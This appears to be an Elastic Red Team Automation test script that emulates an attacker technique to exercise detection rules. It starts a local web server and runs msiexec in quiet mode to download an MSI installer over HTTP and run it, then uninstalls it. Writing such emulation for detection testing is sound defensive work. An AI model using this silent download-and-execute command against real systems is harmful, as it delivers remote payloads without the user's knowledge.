Files
sigma-rules/rta/msiexec_http_installer.py
T
2021-03-03 22:12:11 -09:00

28 lines
914 B
Python

# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
# Name: MsiExec with HTTP Installer
# RTA: msiexec_http_installer.py
# ATT&CK:
# Description: Use msiexec.exe to download an executable from a remote site over HTTP and run it.
from . import common
@common.requires_os(common.WINDOWS)
def main():
common.log("MsiExec HTTP Download")
server, ip, port = common.serve_web()
common.clear_web_cache()
common.execute(["msiexec.exe", "/quiet", "/i", "http://%s:%d/bin/Installer.msi" % (ip, port)])
common.log("Cleanup", log_type="-")
common.execute(["msiexec", "/quiet", "/uninstall", "http://%s:%d/bin/Installer.msi" % (ip, port)])
server.shutdown()
if __name__ == "__main__":
exit(main())